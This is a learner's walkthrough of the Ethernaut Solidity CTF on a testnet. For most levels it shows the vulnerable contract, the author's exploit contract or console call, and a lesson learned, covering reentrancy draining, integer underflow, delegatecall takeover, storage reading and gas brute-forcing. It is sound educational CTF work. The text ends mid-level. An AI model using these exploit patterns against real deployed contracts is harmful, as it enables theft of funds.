# Ethernaut Notes / Walkthrough
To help me get the most out of the Ethernaut experience, I am writing up some documentation as I go. Figuring all of this out for myself has been lots of fun and a great learning experience - I would recommend anybody else solving Ethernaut for the first time to figure it on their own too, without following a document like this. Writing this document is mostly an exercise to help me solidify my own knowledge.

## Getting started: the absolute basics
Here are a few basic things about how the whole thing runs, that I didn't know before I started. I learned most of this from Level 0.
- The game is played in a test environment, but that environment is a real blockchain. The most commonly-used "testnet" at the time of writing was Sepolia, but there are others you can use. You are interacting from a real wallet address, and using your "real" testnet balance to execute transactions.
- You can't transfer other currencies in/out of a testnet, so you won't need to use any of your "real" money to complete Ethernaut.
- Ethernaut is designed to be used with the browser extension MetaMask to interface with various blockchains from within your browser. There are other ways to do this, but MetaMask is easy enough to use and no-commitment.
- In MetaMask, you will need to set up a new wallet address, and put some testnet balance in it. You can do this through a "faucet", which just gives you some (testnet-only) balance. I got all of my testnet balance (Sepolia ETC) from [here](https://cloud.google.com/application/web3/faucet/ethereum/sepolia), but you can easily find other faucets online.
- A lot of the learning here, at least in the first handful of levels, is just figuring out how to interface with everything, often via the web3js console on the Ethernaut page (which I call the Ethernaut console), but also "externally" via other tools like [RemixIDE](https://remix.ethereum.org/).

## Level 0: Hello Ethernaut
This is just a tutorial level, which gets you to set up MetaMask, interact with basic functionality via the console, etc. At the end of the instructions you're asked to call the `info()` method, which sends you on a trail of method calls which eventually gets you to fetch the password from `password()` and call the `authenticate()` method with the embedded password.

I don't recommend this, but if you want to skip most of the steps in this level, you can just run `contract.authenticate(await contract.password())` in the console. Once you have completed the level, you need to press "Submit Instance", which tells Ethernaut to check that you have met the level's requirements, and marks the level as completed.

## Level 1: Fallback

<details><summary>The "Fallback" Contract</summary>

```
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Fallback {
    mapping(address => uint256) public contributions;
    address public owner;

    constructor() {
        owner = msg.sender;
        contributions[msg.sender] = 1000 * (1 ether);
    }

    modifier onlyOwner() {
        require(msg.sender == owner, "caller is not the owner");
        _;
    }

    function contribute() public payable {
        require(msg.value < 0.001 ether);
        contributions[msg.sender] += msg.value;
        if (contributions[msg.sender] > contributions[owner]) {
            owner = msg.sender;
        }
    }

    function getContribution() public view returns (uint256) {
        return contributions[msg.sender];
    }

    function withdraw() public onlyOwner {
        payable(owner).transfer(address(this).balance);
    }

    receive() external payable {
        require(msg.value > 0 && contributions[msg.sender] > 0);
        owner = msg.sender;
    }
}
```
</details>

At this point we see our first Solidity code and start sending our first "real" transactions. The goal for this level is to take ownership of the contract and empty its balance.

If you have a read through the Solidity code that defines the Fallback contract, it's not hard to spot the path to taking ownership: the `receive()` method, which is a "fallback" method, meaning it's what is executed when a transaction sends some balance but does not specify a method to execute. Further, executing `receive()` will only work if your own balance is non-zero (according to the contract's internal bookkeeping in `contributions`).

### A note on retrieving values
You can retrieve value of the state variable `owner` with the autogenerated getter method `owner()`. However, such a getter method isn't generated for the state variable `contributions`, as it is a mapping. Mappings are usually sparsely-populated, with a huge input range but most outputs reverting to the default value. In fact, Solidity does not keep track of the list of keys that have non-default values; only the hashes of such keys, and these are still not accessible within Solidity. Therefore Solidity does not generate a regular getter for the whole `contributions` mapping, but instead a parameterised getter.

So, in this level we can check our contributions in the Ethereum console with `await contract.contributions(player)`. However, the value we get from this is not a simple number: it's an object containing a serialisation of a large number. This is because the values in `contributions` are of type `uint256`, and this can represent numbers much larger than what can be natively represented in JavaScript. We can turn this into something more human-readable with one of the following incantations. The former will only work if the value returned is small enough, otherwise you'll need to rely on the latter. If you need to do any real work with these values programatically, it's easy enough to pipe the string representation into JavaScript's `BigInt` type.
```
(await contract.contributions(player)).toNumber();
(await contract.contributions(player)).toString();
```

### A note on sending balance with a method call
The next thing I need to do on this level is actually sending some balance along with a method call. The approaches we have used so far to call contract methods have not involved sending any ether, or at least not specifying how much ether we send. This turned out to be pretty simple, but not particularly-well documented; I think the advice in the CTF level wanted us to google the phrase "How to send ether when interacting with an ABI" perhaps. This still pointed me to stackexchange answers, which is not documentation.

In the end, I was able to contribute 0.0005 ether with the following:
```
contract.contribute({value:web3.utils.toWei("0.0005", "ether")});
```

There is also a `toWei()` function available in the global scope, but I opted for the above method as it was better (instrinsically) documented.

### Actually solving the level
So far we have just been playing with the interface, but the way to solve this level is clear from looking at the `receive()` method: you just need to have a non-zero contribution, and then send some more ether to be received by the `receive()` method. This will grant you ownership, and then you can do what you want.

> A lesson from this level: many methods are "payable", but if you send a payment to a contract with no method name, it falls back to the `receive()` method.

But the next thing is again an interface question: how do I send some ether to this contract without specifying a method? Turns out this was pretty simple too:
```
contract.send(web3.utils.toWei("0.0005", "ether"));
```

After this has gone through, we can see that we are now the owner by querying `await contract.owner()`. We have claimed ownership of the contract, we just need to reduce its balance to 0. This can be achieved with `contract.withdraw()` now that we are the owner, and this completes this level.

# Level 2: Fal1out
<details><summary>The "Fal1out" Contract</summary>

```
import "openzeppelin-contracts-06/math/SafeMath.sol";

contract Fallout {
    using SafeMath for uint256;

    mapping(address => uint256) allocations;
    address payable public owner;

    /* constructor */
    function Fal1out() public payable {
        owner = msg.sender;
        allocations[owner] = msg.value;
    }

    modifier onlyOwner() {
        require(msg.sender == owner, "caller is not the owner");
        _;
    }

    function allocate() public payable {
        allocations[msg.sender] = allocations[msg.sender].add(msg.value);
    }

    function sendAllocation(address payable allocator) public {
        require(allocations[allocator] > 0);
        allocator.transfer(allocations[allocator]);
    }

    function collectAllocations() public onlyOwner {
        msg.sender.transfer(address(this).balance);
    }

    function allocatorBalance(address allocator) public view returns (uint256) {
        return allocations[allocator];
    }
}
```
</details>
This is a funny one. It's an error that seems almost too obvious to be real: there's just a typo in the name of the "constructor" of this contract, which means that the method intended as a constructor was not called during contract deployment, and it also means that this method is still available to be called after deployment. So we just need to call that method and it will make us the owner.

```
contract.Fal1out();
```

Calling the above was all that was needed to complete this level.

# Level 3: Coin Flip
<details><summary>The "Coin Flip" Contract</summary>

```
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract CoinFlip {
    uint256 public consecutiveWins;
    uint256 lastHash;
    uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;

    constructor() {
        consecutiveWins = 0;
    }

    function flip(bool _guess) public returns (bool) {
        uint256 blockValue = uint256(blockhash(block.number - 1));

        if (lastHash == blockValue) {
            revert();
        }

        lastHash = blockValue;
        uint256 coinFlip = blockValue / FACTOR;
        bool side = coinFlip == 1 ? true : false;

        if (side == _guess) {
            consecutiveWins++;
            return true;
        } else {
            consecutiveWins = 0;
            return false;
        }
    }
}
```
</details>


For this level, we are given a contract intended to make you guess the outcome a 50/50 event, and get it right 10 times in a row. You can make a guess with `contract.flip()`, and you can see the number of times you have guessed correctly so far with `(await contract.consecutiveWins()).toNumber()`.

From inspecting the contract, we can see that they are using the hash of the current block to determine the coin flip's result. At first it looked like a parity check, but I think they are checking if the hash is greater or less than the large value stored in `FACTOR`, via integer division. I am assuming that `FACTOR` is half of the max value of `uint256`. It doesn't actually matter the intention, what matters is that we can do the same computation to predict what the outcome will be.

Now, this may be possible from the developer console - I had a quick look, and I think it's doable if you're kinda fast enough and you have access to the same `blockhash` function, but I don't want to try to replicate hashing and integer division semantics in JavaScript. The Ethereum level suggests we start moving outside of this environment, and it makes sense to make an attack contract here.

I won't give a setup guide for [Remix](https://remix.ethereum.org/), but I opened it for the first time and had it running in 5 minutes. I just had to set the environment to `Injected Provider - MetaMask` for it to connect to the appropriate test chain and associate with my wallet address on that chain.

I wrote up the following contract:
```
contract CrystalBall {
    uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;

    function makeGuess(address coinFlipAddress) external {
        uint256 blockValue = uint256(blockhash(block.number - 1));
        uint256 coinFlip = blockValue / FACTOR;
        bool side = coinFlip == 1 ? true : false;
        CoinFlip(coinFlipAddress).flip(side);
    }
}

interface CoinFlip {
  function consecutiveWins (  ) external view returns ( uint256 );
  function flip ( bool _guess ) external returns ( bool );
}
```

This just reproduces the coin flip logic and calls the level contract to make the 'correct' guess. There is protection in the level contract to prevent multiple guesses in the same block, so we will need to take at least 10 blocks to make 10 guesses. In my attack contract I don't bother to check that we are on a new block since the last guess, as attemping to guess too frequently will just cause a `revert`, which will cost me nothing except some gas fees.

The only tricky part for a total Solidity newcomer was figuring out how to call an external contract from within this contract, by address. It sounds like there are a few ways of doing this, but the `interface` method seems the safest and simplest. I manually wrote the interface myself the first time, but this didn't seem ideal, so instead I found it convenient to extract the level contract's JSON ABI from the Ethernaut console with `JSON.stringify(contract.abi)`, which gave me the following:
```
[{"type":"constructor","inputs":[],"stateMutability":"nonpayable"},{"type":"function","name":"consecutiveWins","inputs":[],"outputs":[{"name":"","type":"uint256","internalType":"uint256"}],"stateMutability":"view","constant":true,"signature":"0xe6f334d7"},{"type":"function","name":"flip","inputs":[{"name":"_guess","type":"bool","internalType":"bool"}],"outputs":[{"name":"","type":"bool","internalType":"bool"}],"stateMutability":"nonpayable","signature":"0x1d263f67"}]
```

This is JSON though, and while there seems to be solidity libraries to import things like this, that seems complex. I'm not sure if there is a simpler method to get a solidity interface from the web3js contract, but I just pasted the above JSON into an ABI/solidity translator [here](https://bia.is/tools/abi2solidity/), which spat out the interface you can see in the code above. All I had to do was change the interface name from `GeneratedInterface` to `CoinFlip`, which wasn't even strictly necessary.

Now I can compile and deploy this contract. There is a "Deploy" tab on the left bar in Remix. Make sure to select `CrystalBall` instead of the `CoinFlip` interface when deploying. Once this is done, you should see an entry under "Deployed Contracts" with a big button called "makeGuess". Pressing this calls the associated method on our contract on-chain, which makes a (correct) coin flip guess on the level contract. After the block is confirmed, you can see this working back on the Ethernaut console with `(await contract.consecutiveWins()).toNumber()`.

> A lesson from this level: "random" is very difficult on most blockchains.

### A note on calling other contracts from the console
While pressing the button in Remix worked for me, I also wanted to know how to call methods on my contract from the Ethernaut console. It turns out this is a bit tricky if you use web3js `Contract`s, but I'll show you the first way I got this working. First, I had to get the ABI and deployed address of my new `CrystalBall` contract from Remix, which I used in the following on the Ethernaut console:
```
var flipperABI = [paste ABI here];
var flipperAddress = "[paste address here]";
var flipper = new web3.eth.Contract(flipperABI, flipperAddress);

// this saves you from specifying the 'from' address with each transaction
flipper.options.from = player;

await flipper.methods.makeGuess.call().send();
```
This is not quite as nice as the TruffleContract interface we have from Ethernaut's provided `contract`, but it's good enough for now.

We just need to make 10 correct guesses, either from the Remix interface or from the Ethernaut console, and then we have completed the level. Depending on how fast the network is mining new blocks, this might take a few minutes though.

# Level 4: Telephone
<details><summary>The "Telephone" Contract</summary>

```
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Telephone {
    address public owner;

    constructor() {
        owner = msg.sender;
    }

    function changeOwner(address _owner) public {
        if (tx.origin != msg.sender) {
            owner = _owner;
        }
    }
}
```

</details>

It seems that everything we need to solve this level we have already learned in the previous level. The only requirement to complete this level is to call the level contract's `changeOwner()` method from our own deployed contract. I deployed the following contract, and calling `makeCall()` completed the level for me.
```
contract PhoneCall {
    address private telephoneAddress = [ethernaut's contract address here];

    function makeCall() external {
        Telephone(telephoneAddress).changeOwner(msg.sender);
    }
}

interface Telephone {
  function changeOwner ( address _owner ) external;
  function owner (  ) external view returns ( address );
}
```

> A lesson from this level: don't mix up `msg.sender` and `tx.origin`; they're not the same thing.


# Level 5: Token
<details><summary>The "Token" Contract</summary>

```
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Token {
    mapping(address => uint256) balances;
    uint256 public totalSupply;

    constructor(uint256 _initialSupply) public {
        balances[msg.sender] = totalSupply = _initialSupply;
    }

    function transfer(address _to, uint256 _value) public returns (bool) {
        require(balances[msg.sender] - _value >= 0);
        balances[msg.sender] -= _value;
        balances[_to] += _value;
        return true;
    }

    function balanceOf(address _owner) public view returns (uint256 balance) {
        return balances[_owner];
    }
}
```

</details>

To complete this level, we need to increase the number of tokens we have, past our starting quota of 20 tokens. A quick glance at the code doesn't show anything super out-of-place, but the issue here is pretty simple: integer underflow. And of course, you can see that they have specified Solidity version 0.6.0, as newer versions of the compiler perform more careful checks on integer arithmetic.

The comparison in `require(balances[msg.sender] - _value >= 0);` will always pass, as `_value` is unsigned, as is everything in `balances`. My first thought was just to send 30 tokens to myself, but this wouldn't work; it would subtract 30 tokens from my balance, resulting in me having a huge number of tokens (2^256-10, give or take off-by-one), but then that number would "increase" again by 30, causing it to *overflow* back to the original 20. The first thing I did was to deploy a contract to send some tokens to myself, but then I realised I didn't even need to do that; I can just send tokens to anybody except myself, so I sent them to the level contract itself.
```
contract.transfer(contract.address, 30); 
```
> A lesson from this level: integer overflow and underflow can break everything. Use a newer version of the Solidity compiler and/or SafeMath. Although there are still ways to cause under/overflow in the latest compiler version too.

Calling the above completed the level for me.

# Level 6: Delegation
<details><summary>The "Delegation" Contract</summary>

```
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Delegate {
    address public owner;

    constructor(address _owner) {
        owner = _owner;
    }

    function pwn() public {
        owner = msg.sender;
    }
}

contract Delegation {
    address public owner;
    Delegate delegate;

    constructor(address _delegateAddress) {
        delegate = Delegate(_delegateAddress);
        owner = msg.sender;
    }

    fallback() external {
        (bool result,) = address(delegate).delegatecall(msg.data);
        if (result) {
            this;
        }
    }
}
```

</details>

The first thing I noticed when looking at this code was `delegatecall()`, which is super interesting. Since you can't update contracts once they are deployed, it's common for contracts to simply be shells that point to implementations elsewhere, and `delegatecall()` allows for method calls to be forwarded from contract A to contract B, such that contract B's code executes *on contract A's storage*. That last part is important.

To complete this level we have to take ownership of the level contract (`Delegation`). So, if we can get the level contract  to make a `delegatecall()` to the `Delegate` contract's `pwn()` method, then it will set `owner` to us, but that `owner` will be pointing back to the memory of the level contract, et voila, we will be the new owners.

> A lesson from this level: `delegatecall()` can be dangerous. Use it very carefully.

However, now we are dealing with some more low-level transaction crafting, and it'll take a bit of learning to figure out how to make the right transaction request here.

We can see the fallback method of `Delegation` will pass on all message data to `Delegate`. `msg.data` contains an encoding of the method ID being called and its arguments. The method ID is an encoding that tells the contract which method to execute, and is just the first 4 bytes of the keccak256 hash of the string representing the method signature. For `pwn()`, that is `dd365b8b`, which I got from [here](https://www.evm-function-selector.click/). If we wanted to also send some parameters with our transaction, we could use `abi.encodePacked()` or similar, but we don't need any parameters for this call.

In the end it was a very simple invocation in the Ethernaut console that gave me the result I wanted:
```
sendTransaction({to:contract.address, from:player, data:"dd365b8b"});
```
It seems that web3js etc took care of all the other details, such as gas price, gas allocation, etc. I'm glad I didn't need to dive into all of those details myself.

# Level 7: Force
<details><summary>The "Force" Contract</summary>

```
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Force { /*
                   MEOW ?
         /\_/\   /
    ____/ o o \
    /~____  =ø= /
    (______)__m_m)
                   */ }
```

</details>

This is another strange one. We are faced with a contract that has no payable methods and no fallbacks defined, but we have to increase the level contract's balance to pass the level. It turns out some contracts really don't want to receive any payments, but there is a tricky way to force a payment on somebody: another contract can self-destruct, and when this happens it sends its entire balance to an address. That address is forced to receive the balance, even if it tries to revert or has no method to receive balance.

It's a bit weird that `selfdestruct()` exists - it looks like there's some interesting history behind it, and it is deprecated in newer EVM versions. Nevertheless, it does exist and it's a way to force payment to an address that doesn't have payment fallbacks. I built the following contract that can receive payment and immediately self-destruct, sending its balance to a supplied address.
```
// SPDX-License-Identifier: GPL-3.0
pragma solidity >=0.7.0 <0.9.0;

contract Voltorb {
    function boom(address payable beneficiary) payable external {
      selfdestruct(payable(address(beneficiary)));
    }
}
```

After deploying this, I created a web3js contract similarly to in previous levels, and then called the `boom()` method with the level contract's address, along with some ether for it to then disperse on self-destruction, using the following invocation:
```
con.methods.boom(contract.address).send({value:web3.utils.toWei("0.0001", "ether")})
```
This completed the level.

# Level 8: Vault
<details><summary>The "Vault" Contract</summary>

```
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Vault {
    bool public locked;
    bytes32 private password;

    constructor(bytes32 _password) {
        locked = true;
        password = _password;
    }

    function unlock(bytes32 _password) public {
        if (password == _password) {
            locked = false;
        }
    }
}
```

</details>

To pass this level, we need to unlock it, which requires knowing the value of the state variable `password`. This variable is private, but of course everything on a blockchain is public, so of course that's going to be stored somewhere.

My first thought was that the password would be encoded on the transaction that called the constructor and created the contract. But then it occurred to me that it will just be in the contract's storage, and that is probably easier to find (although both are public). This still took a bit of looking around - I thought I'd find the data I needed more quickly on EtherScan etc, but in the end there is a simple web3js method that gets me what I need.
```
await web3.eth.getStorageAt(contract.address, 0)
-> 0x0000000000000000000000000000000000000000000000000000000000000001
```

The above gave me the first 32 bytes of storage, which looks suspiciously like a boolean `true`. This makes sense as the first part of storage, as the boolean variable `locked` is declared before `password`. We could think about how state variables are packed together when they are placed in storage, but for now we will just inspect storage manually. The next entry is:

```
await web3.eth.getStorageAt(contract.address, 1)
-> 0x412076657279207374726f6e67207365637265742070617373776f7264203a29
```

This is some raw binary data. My first thought was that I'd need to decode this somehow, but the type of `password` is just `bytes32`, so I was able to complete the level with the following invocation:

```
contract.unlock("0x412076657279207374726f6e67207365637265742070617373776f7264203a29");
```

> A lesson from this level: eveything on-chain is public. This is why zero-knowledge proofs are so important in blockchain work.

Out of interest, I converted the above hex string into an ASCII string, and the encoded password is "A very strong secret password :)", which is conveniently 32 characters long.

# Level 9: King
<details><summary>The "King" Contract</summary>
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract King {
    address king;
    uint256 public prize;
    address public owner;

    constructor() payable {
        owner = msg.sender;
        king = msg.sender;
        prize = msg.value;
    }

    receive() external payable {
        require(msg.value >= prize || msg.sender == owner);
        payable(king).transfer(msg.value);
        king = msg.sender;
        prize = msg.value;
    }

    function _king() public view returns (address) {
        return king;
    }
}
</details>

The goal here is to prevent the Ethernaut level from being able to become 'king' again, after you submit the level. It doesn't say that you have to be king yourself. This took me a minute to see, but the trick is to make the king an address that isn't payable. Then, when the Ethernaut level tries to reclaim kinghood, `transfer()` will fail when it tries to send the balance back, and revert, making the unpayable king unusurpable.

> A lesson from this level: don't assume all addresses are payable, or that all payments will succeed.

I can't make my own wallet unpayable, but I can just make an unpayable contract, then make that contract king, and then we are golden. You can't give a contract any balance during contract creation though, so I'll need to make the contract somewhat payable, so that it can send balance to become 'king'. I'll just have to make it so that the Ethernaut level fails when it tries to pay it back, for example by setting a flag that refuses all future payments.

I implemented a solution this way, but I came across something while I was working on it that I want to use to break the level instead. It's a subtle difference: instead of making the king unpayable, I will make it so the king can't be paid via the `transfer()` method. The `transfer()` method only allocates 2300 gas for the recipient's fallback method to use, so if we exceed this amount, it will fail and revert. I think the way the Ethernaut devs built the original `King` contract was to intentionally drop us into the same trap, which was clever.

At this point I also got sick of defining contracts in the Ethernaut console, so i built a couple of simple helpers:
```
var makeContract = (addr, abi) => { var con = new web3.eth.Contract(abi, addr); con.options.from=player; return con; };

var wei = x => web3.utils.toWei(x, "ether");
```

So I built the following contract, which can not receive funds via `transfer()`. I could have just written a loop or something to burn the 2300 wei, but I figured that calling the `transfer()` method itself will of course burn more than 2300 wei, so that should do the trick. I suppose if this wasn't going to run out of gas this would become some kind of reentrancy problem, but that's a topic for the next level I think.
```
// SPDX-License-Identifier: GPL-3.0
pragma solidity >=0.7.0 <0.9.0;

contract ForeverKing {
    function usurp(address payable kingGame) payable external {
        payable(kingGame).call{value: address(this).balance}("");
    }

    receive() external payable {
        payable(msg.sender).transfer(msg.value);
    }
}
```
I deployed the above contract and invoked it with the following, which completed the level.
```
con.methods.usurp(contract.address).send({value:wei("0.0015")})
```

# Level 10: Re-entrancy

This is a famous vulnerability. The code provided here allows you to `withdraw()` some balance, but it sends the balance with the `call()` method, which doesn't have a strict gas limit (as it did the previous level). In this case, this allows me to call `withdraw()` again from the `receive()` method, and since the level contract doesnt perform bookkeeping until after the transfer, we are able to withdraw balance as many times as we like (or at least until we run out of gas).

I built and deployed the following contract, and then executed the exploit with the following invocation:
```
// SPDX-License-Identifier: GPL-3.0
pragma solidity >=0.7.0 <0.9.0;

contract Level10 {
    address private victim;
    uint256 private withdrawAmount;
    function attack(address victimAddress) payable external {
        victim = victimAddress;
        withdrawAmount = msg.value;
        Reentrance(victim).donate{value:msg.value}(address(this));
        Reentrance(victim).withdraw(withdrawAmount);
    }

    receive() external payable {
        Reentrance(victim).withdraw(withdrawAmount);
    }
}

interface Reentrance {
  function balanceOf ( address _who ) external view returns ( uint256 balance );
  function balances ( address ) external view returns ( uint256 );
  function donate ( address _to ) external payable;
  function withdraw ( uint256 _amount ) external;
}
```
```
con.methods.attack(contract.address).send({value:toWei("0.0005")});
```

The target contract started off with 0.001 ether, so I just needed to start this process with a number that will multiply into 0.001. 0.001 would have already been enough, but I used 0.0005 just to give my exploit a chance to stretch its legs. This worked, and completed the level.

> A lesson from this level: Transferring balance to contracts is dangerous, whether you use a limited-gas method or an unlimited-gas method.

Something to note here is that `revert()` doesn't "bubble up" through a `call()` invocation. This is why I didn't have to be careful with terminating my re-entrancy loop the right way. At some point I would call `withdraw()` and it would fail and revert, but this wouldn't revert all of my sneaky work up to that point, just the execution of the deepest (failing) `withdraw()`.

# Level 11: Elevator

At first glance, I think this is going to be about the `pure` method modifier. We need to implement an interface, and we can break the assumptions of the victim contract if we implement a method impurely, because the victim contract assumes the method to be pure. In this sense, I use "pure" to mean that the same input will always produce the same output. In Solidity, `view` would also give the desired effect here, but `pure` is an even stronger property.

> A lesson from this level: don't make assumptions about methods implemented in other contracts: "in an investigation, assumptions kill". Be as precise as you can with method modifiers.

I deployed the following contract and invoked its `getToTopFloor()` method with the victim contract's address, and this completed the level.

```
// SPDX-License-Identifier: GPL-3.0
pragma solidity >=0.7.0 <0.9.0;

contract ImpureBuilding {
    bool private sayNoOnce = true;
    function isLastFloor(uint256) external returns (bool) {
        if (sayNoOnce) {
            sayNoOnce = false;
            return false;
        }
        return true;
    }

    function getToTopFloor(address elevator) external {
        Elevator(elevator).goTo(1);
    }
}

interface Elevator {
  function goTo ( uint256 _floor ) external;
}
```

# Level 12: Privacy
```
contract Privacy {
    bool public locked = true;
    uint256 public ID = block.timestamp;
    uint8 private flattening = 10;
    uint8 private denomination = 255;
    uint16 private awkwardness = uint16(block.timestamp);
    bytes32[3] private data;

    constructor(bytes32[3] memory _data) {
        data = _data;
    }

    function unlock(bytes16 _key) public {
        require(_key == bytes16(data[2]));
        locked = false;
    }

    /*
    A bunch of super advanced solidity algorithms...

      ,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`
      .,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,
      *.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^         ,---/V\
      `*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.    ~|__(o.o)
      ^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'^`*.,*'  UU  UU
    */
}
```
This level seems almost identical to "Vault". There is a private variable in the contract's state, and we need that value to unlock the contract and pass the level. The only difference here is that the data is slightly less obviously placed.

The password is in `data[2]`. Instead of trying to calculate where I expect that piece of data to live in storage, I just printed the first handful of pages (is "page" the right term?) in the contract's storage to inspect them. What I got was:
```
await web3.eth.getStorageAt(contract.address, [index]); 
[0]: 0x0000000000000000000000000000000000000000000000000000000000000001
[1]: 0x0000000000000000000000000000000000000000000000000000000067cc2b64
[2]: 0x000000000000000000000000000000000000000000000000000000002b64ff0a
[3]: 0x43b3ddb218d1f4f2070643816f15c9814c2b105dc9648a459c02ba97627b44c7
[4]: 0xf98f451e75dd214bbd77286a0d6925ffe6bb76431e1e679f8d3b099dc8c09566
[5]: 0xa341432f16b3bf30d347d6b6a3261b4a05b3c073ebb4b1eca9b0e5481d04435b
```

Matching this to contract's declared variables in the same order, we can see that page 0 is 32 whole byes representing the boolean `true`, similar to what we could see in the "Vault" level. Page 1 looks like it's all just `timestamp`. The next three state variables are of type `uint8` and `uint16`, which respectively take up 8 and 16 *bits*, so these seem packed into the same 32 byte page, and we can recognise the values 10 and 255 as `0a` and `ff` at the "start" (last digits) of the page. So, the three values in `data` must be pages 3, 4, and 5. So `data[2]` is page 5.

However, that's not the end of the story, there's a casting that happens before the comparison. `data[2]` is a `bytes32`, bit it is cast into `bytes16` and then compared to `_key`. Without looking it up, I'm going to try both halves of the page and see which one unlocks the contract. Turns out it's the left-hand bits, so the following unlocked the contract and completed the level.
```
contract.unlock("0xa341432f16b3bf30d347d6b6a3261b4a");
```

# Level 13: Gatekeeper One
```
contract GatekeeperOne {
    address public entrant;

    modifier gateOne() {
        require(msg.sender != tx.origin);
        _;
    }

    modifier gateTwo() {
        require(gasleft() % 8191 == 0);
        _;
    }

    modifier gateThree(bytes8 _gateKey) {
        require(uint32(uint64(_gateKey)) == uint16(uint64(_gateKey)), "GatekeeperOne: invalid gateThree part one");
        require(uint32(uint64(_gateKey)) != uint64(_gateKey), "GatekeeperOne: invalid gateThree part two");
        require(uint32(uint64(_gateKey)) == uint16(uint160(tx.origin)), "GatekeeperOne: invalid gateThree part three");
        _;
    }

    function enter(bytes8 _gateKey) public gateOne gateTwo gateThree(_gateKey) returns (bool) {
        entrant = tx.origin;
        return true;
    }
}
```

It looks like there are three gates to get through.
- Gate One just requires us to pass this request through a deployed contract.
- Gate Two requires a specific amount of gas to be left at the point of checking.
- Gate Three requires us to pass in a key that appears to be some data derived from the player's address.

My main concern here is how to assign just the right amount of gas such that `gasleft()` gives the right value when it is called. I think I could either try to predict this through examining the amount of gas used by everything leading up to that call, or I could just deploy the contract and step through it to see what happens. I started with the latter.

To better debug this in Remix, I switched to the VM, deployed a copy of `GatekeeperOne` and the following contract, which allowed me to play around with the amount of gas allocated to the cross-contract call to `enter()`.
```
contract EntrantOne {
    function enter(address gatekeeperAddress, uint256 gasToUse, bytes8 gateKey) external {
        GatekeeperOne(gatekeeperAddress).enter{gas:gasToUse}(gateKey);
    }
}
```

> Note: I ended up taking a different approach, but what I learned from this first approach was still useful.

My first call I allocated 1000000 gas to the transaction (which of course failed). Using Remix to debug this transaction, I was able to trace the execution through to the `GAS` opcode, and see that before executing that instruction there was 999586 gas remaining. I looked up the EVM opcode and can see that this returns the amount of gas remaining, after spending the 2 gas needed to execute that instruction. Indeed, I could see that after this instruction, the top of the stack contained `f40a0`, which is 999584 in decimal, so this makes sense.

Given that I started with 1000000 gas, it seems that this algorithm uses 416 gas by the time it has executed the `GAS` operation. So I next ran the same transaction with 8191*100+416 = 819516 gas. Actually I decided that a better opcode to watch was `MOD` when debugging. This time, I stepped to that point and took a look at the stack, which contained `c7f9c` (819100) and `1fff` (8191). After the `MOD` operation, the top of the stack is zero, which is exactly the outcome we wanted.

Next we need to figure out how to pass the third gate. The parameter `_gateKey` is of type `bytes8`, which takes up 64 bits. There are three checks against this key, which seem to compare various sections of bits in the data.

The first part casts both sides to `uint64`, then one side to `uint32` and the other `uint16`. If we assume that these casts take the lower bits in all cases, this condition would probably be asserting that bits 16-31 are zeroes in the input key. Setting the input to all zeroes got us past the first hurdle.

The next part asserts inequality between the 32 bit casting and the full 64 bits. This would mean that the higher 32 bits can't be entirely zeros. Making the first hex character of the input an `f` got us past the second hurdle.

The third part seems to require some part of the key to matxh `tx.origin`, which is the player's address. The left-hand side seems to ask for the lower 32 bits of the key, and the right-hand side seems to be asking for the lower 16 bits. So I made the final four characters of the input key the final four characters of my wallet address.

This worked for the copy of the contract that I had deployed, including when I switched over to the real testnet and again deployed a copy of the contract. However, I wasn't getting the same result when trying to infiltrate the real contract. Remix in theory will let you step through bytecode to debug, but it was bugging out, which seems to be a known issue. It makes sense that a specific compiler version or compiler options would change some little things like the exact amount of gas used to get to a certain point, and I don't have access to the compiler settings used to compile the Ethernaut level.

I would have been content to step manually through the bytecode of the contract and examine the amount of gas left when the `GAS` opcode executes, but after a deep-dive into debugging (including learning to use Tenderly and Foundry, running my own local fork to debug locally as well as in Remix), I found that tooling is very lacking when it comes to stepping through the bytecode of a cross-contract call.

>A lesson from this level. Understanding bytecode isn't hard. Getting a tool to properly step through bytecode for you can be very hard, and it's even harder if you want that bytecode mapped to some source code.

This is something I still want to tackle at some point, but eventually I thought I'd look up others' solutions to this level to see if I had missed some method of properly tracing through the transaction, and realised that others were just brute-forcing the solution (including the official solution). So, even though I wanted to solve this a bit more elegantly, I decided that I should climb out of my bytecode tracing rabbit hole and just do it the easy way.

The following contract got the job done for me. I had no intention of looking up others' solutions when solving Ethernaut myself, but in this instance I was looking for debugging advice, and I came across the official solution, which cleverly uses `.call()` instead of directly accessing the method `enter()`, which stops the `revert()` from bubbling up, and allows the contract to try lots of gas starting points until it succeeds. I implemented the same approach, which worked for me and completed the level. I also decided to generate the appropriate `gateKey` instead of just manually entering the one I had calculated by hand before.
```
contract EntrantOne {
    function enter(address gatekeeperAddress) external {
        bytes8 key = bytes8(uint64(0x8000000000000000) | uint16(uint160(tx.origin)));
        bytes memory params = abi.encodeWithSignature(("enter(bytes8)"), key);
        for (uint256 i = 100; i < 8191; i++) {
            (bool result,) = address(gatekeeperAddress).call{gas:819100+i}(params);
            if (result) break;
        }
    }
}
```

# Level 14: Gatekeeper Two

```
contract GatekeeperTwo {
    address public entrant;

    modifier gateOne() {
        require(msg.sender != tx.origin);
        _;
    }

    modifier gateTwo() {
        uint256 x;
        assembly {
            x := extcodesize(caller())
        }
        require(x == 0);
        _;
    }

    modifier gateThree(bytes8 _gateKey) {
        require(uint64(bytes8(keccak256(abi.encodePacked(msg.sender)))) ^ uint64(_gateKey) == type(uint64).max);
        _;
    }

